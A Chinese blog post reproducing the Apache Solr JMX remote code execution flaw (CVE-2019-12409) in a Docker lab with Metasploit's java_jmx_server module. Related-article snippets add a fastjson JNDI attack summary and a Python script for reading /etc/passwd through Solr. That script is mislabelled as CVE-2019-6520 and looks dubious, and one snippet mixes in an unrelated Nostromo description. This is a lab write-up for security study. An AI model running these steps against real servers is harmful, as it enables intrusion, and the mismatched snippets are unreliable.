Apache Solr 远程命令执行漏洞(CVE-2019-12409)

最新推荐文章于 2023-03-23 16:10:46 发布
最新推荐文章于 2023-03-23 16:10:46 发布
阅读量1.8k 收藏 2
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/107168440
版权

Apache Solr 远程命令执行漏洞(CVE-2019-12409)

前言

影响Apache Solr 8.1.1到8.2.0版本

环境搭建

启动docker

systemctl start docker

获取vulhub

git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git

进入对应目录

cd vulhub/solr/CVE-2019-17558/

修改配置
docker-compose.yml

version: '2'
services:
 solr:
   command: solr-demo
   image: vulhub/solr:8.2.0
   ports:
    - "8983:8983"
    - "18983:18983"

启动容器

docker-compose up -d

查看容器

docker ps

在这里插入图片描述

漏洞复现

进入docker容器查看配置(a0为docker ps中的容器id)

docker exec -it a0 /bin/bash
cd bin
cat solr.in.sh.orig

在这里插入图片描述
在这里插入图片描述
存在ENABLE_REMOTE_JMX_OPTS="true"
配置msf

msfconsole
use exploit/multi/misc/java_jmx_server
set rhosts 192.168.164.162
set rport 18983
run

在这里插入图片描述

参考文章

https://mp.weixin.qq.com/s/hCLEfDpXfDDWTTDd6vgtVA

whojoe
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
声明 此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。安全从业者遵守法律规定,禁止在没有得到授权的情况下做任何突破检测。 简介 理论上可以使用各种不同类型的数据源来构造 Exploit1使用数据源的类型为URLDataSource Exploit2使用的数据源类型为ContentStreamDataSource 检测突破-Exploit1 Exploit1使用数据源的类型为URLDataSource 优点:结果回显支持对Solr低版本的检测 缺点:需要出网 步骤1 构造URLDataSource类型的数据源(Solr服务器会去访问该数据源!)可以直接使用这个 文档demo.xml即URLDataSource类型的数据源一份无害的正常XML文档 文档中只有一个item元素骑士实现只执行1次命令 也可以自己启动网络服务器托
2023渗透测试面试热门题
最新发布
m0_61101264的博客
10-25 353
答:(1)Fastjson是Alibaba开发的Java语言编写的高性能JSON库(2)攻击者准备rmi服务和web服务,将rmi绝对路径注入到lookup方法中,受害者JNDI接口会指向攻击者控制rmi服务器,JNDI接口向攻击者控制web服务器远程加载恶意代码,执行构造函数形成RCE(3)fastjson漏洞历史(fastjson接受的JSON可以通过艾特type字段来指定该JSON应当还原成何种类型的对象,在反序列化的时候方便操作)2.fastjson-1.248以下。
Apache Solr错误默认配置导致的RCE(CVE-2019-12409
黑白的博客
11-22 492
声明 好好学习,天天向上 漏洞描述 Apache Solr的8.1.1和8.2.0版本的自带配置文件solr.in.sh中存在不安全的选项ENABLE_REMOTE_JMX_OPTS=“true”。如果受害者使用了该默认配置,则会在默认端口18983开放JMX服务,且默认未开启认证。任何可访问此端口的攻击者可利用此漏洞向受影响服务发起攻击,执行任意代码。 ​ 建议快速响应,将solr.in.sh配置文件中的ENABLE_REMOTE_JMX_OPTS选项设置为false,然后重启Solr服务。 影响范围
执行sh文件_【漏洞通告】Apache Solr远程代码执行漏洞
weixin_39581972的博客
11-24 162
1.综述Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。Apache Solr存在远程代码执行漏洞,该漏洞源于默认配置文件solr.in.sh中包含ENABLE_REMOTE_JMX_OPTS配置选项的不安全设置。2.漏洞概述漏洞类型:远程代码执行漏洞危险等级: 高危受影响系统: ...
[CVE-2019-12409] Apache Solr JMX RCE
公众号shadow sock7
02-24 727
参考: https://github.com/jas502n/CVE-2019-12409 只影响8.1.1和8.2.0。 下载: git clone https://github.com/mogwailabs/mjet 利用: [master][~/GitProjects/mjet]$ java -jar ~/downloads/jython-standalone-2.7.1.jar mje...
(环境搭建+复现)CVE-2019-12409 Apache Solr远程代码执行漏洞
daxi0ng的博客
03-16 2459
CVE编号】 CVE-2019-12409漏洞名称】 Apache Solr远程代码执行漏洞 1【靶标分类】 web中间件漏洞 2【漏洞分类】 命令执行 3【漏洞等级】 高 4【漏洞简介】 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件...
【vulfocus漏洞复现-初级】solr 代码执行 (CVE-2019-12409)
ll_515的博客
01-20 1429
Apache Solr受影响的版本8.1.1和8.2.0在solr.in.sh配置文件中默认开启了ENABLE_REMOTE_JMX_OPTS配置项,即允许远程加载JMX,导致可远程代码执行
rmi远程代码执行漏洞_[漏洞预警]CVE201912409/Apache Solr由于错误配置JMX RMI导致远程代码执行...
weixin_30101051的博客
01-05 432
漏洞描述近日安全研究人员JanHøydahl披露了Apache Solr的8.1.1和8.2.0发行版中的默认配置文件solr.in.sh,在其配置文件中ENABLE_REMOTE_JMX_OPTS字段默认配置不安全.如果使用受影响版本中的默认配置,那么将启用JMX监视服务并将对公网监听一个18983的RMI端口,且无需进行任何身份验证,配合JMX RMI将会导致远程代码执行.CVE编号...
solr 代码执行 (CVE-2019-12409)
千寻的博客
03-23 2075
Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。是apache的顶级开源项目,使用java开发 ,基于lucene的全文检索服务器。 Java ManagementExtensions(JMX)是一种Java技术,为管理和监视应用程序、系统对象、设备(如打印机)和面向服务的网络提供相应的工具。JMX 作为 Java的一种Bean管理机制,如果JMX服务端口暴露,那么远程攻击者可以让该服务器远程加载恶意的Bean文件,随着Bean的滥用导致远程代码执行
Apache Solr 8.1.1和8.2.0版本 JMX服务远程代码执行漏洞(CVE-2019-12409)
weixin_44047654的博客
02-14 466
Apache Solr 8.1.1和8.2.0版本 JMX服务远程代码执行漏洞(CVE-2019-12409)
Apache Tomcat CVE-2019-0232 远程代码执行漏洞 - tdcoming'blog QQ group 90
08-04
背景:近日,ApacheSolr官方团队在最新的安全更新中披露了一则ApacheSolrDeserialization远程代…阅读数 1386557篇文章排名:
CVE-2019-0193 Apache-Solr via Velocity template RCE.MD
04-12
CVE-2019-0193 Apache-Solr via Velocity template RCE
CVE-2020-13957 Apache Solr 未授权上传.md
04-13
CVE-2020-13957 Apache Solr 未授权上传
cve-2021-21985漏洞复现
whojoe的博客
06-09 6427
cve-2021-21985漏洞复现受影响的版本:漏洞复现后续利用参考文章 受影响的版本: VMware vCenter Server 7.0系列 < 7.0.U2b VMware vCenter Server 6.7系列 < 6.7.U3n VMware vCenter Server 6.5系列 < 6.5 U3p VMware Cloud Foundation 4.x 系列 < 4.2.1 VMware Cloud Foundation 4.x 系列 < 3.10.2.1
(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)
whojoe的博客
07-06 5776
F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)前言漏洞详情影响版本修复建议环境搭建漏洞复现参考文章 前言 漏洞详情 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。 未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包
Jenkins-CVE-2016-0792漏洞复现(Xstream 反序列化漏洞
whojoe的博客
06-04 4646
Jenkins-CVE-2016-0792漏洞复现(Xstream 反序列化漏洞)环境搭建漏洞复现环境清理参考文章 环境搭建 首先需要安装jenkins,这里使用的是1.642.1版本,其他版本可以自行下载,在官网和百度一开始都是没找到的,包括看了其他人的分析,但是都没有找到环境搭建,大部分是直接复现和poc分析 下载链接 http://archives.jenkins-ci.org/war-stable/1.642.1/jenkins.war 这里需要在本地配置java环境,具体方法这里不在介绍,我复现
Apache Shiro Padding Oracle Attack (Shiro-721)漏洞复现
whojoe的博客
05-11 4597
Apache Shiro Padding Oracle Attack (Shiro-721)漏洞复现环境搭建安装git使用dockerfile启动docker获取dockerfile查看是否搭建成功centos7+tomcat8启动docker一系列命令登录测试账户抓取cookie安装maven使用Java反序列化工具 ysoserialshiro_exp.py参考文章 环境搭建 环境使用centos7+docker 安装git yum install git 使用dockerfile 启动docker
Apache Shiro 权限绕过漏洞 (Shiro-682)复现
whojoe的博客
05-12 3469
Apache Shiro 权限绕过漏洞 (Shiro-682)复现环境搭建下载代码导入idea检查参考文章 环境搭建 下载代码 https://github.com/lenve/javaboy-code-samples/tree/master/shiro/shiro-basic 将上面地址里的tree/master换成trunk,然后用svn co检出 svn co https://github.com/lenve/javaboy-code-samples/trunk/shiro/shiro-basic
cve-2019-6520编写poc
05-25
CVE-2019-6520是一个Apache Solr中的任意文件读取漏洞。攻击者可以利用该漏洞读取服务器上的任意文件。 下面是一个简单的Python脚本,可以利用该漏洞读取指定文件: ```python import requests url = "http://<target>/solr/+/get" params = { "getParams": { "content": "file:/<path to file>" } } response = requests.get(url, params=params) print(response.text) ``` 将`<target>`替换为目标服务器的IP地址或域名,将`<path to file>`替换为要读取的文件的路径。 例如,要读取`/etc/passwd`文件,可以使用以下命令: ```python import requests url = "http://example.com/solr/+/get" params = { "getParams": { "content": "file:/etc/passwd" } } response = requests.get(url, params=params) print(response.text) ``` 请注意,此脚本仅用于学习和研究目的,不应用于未经授权的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值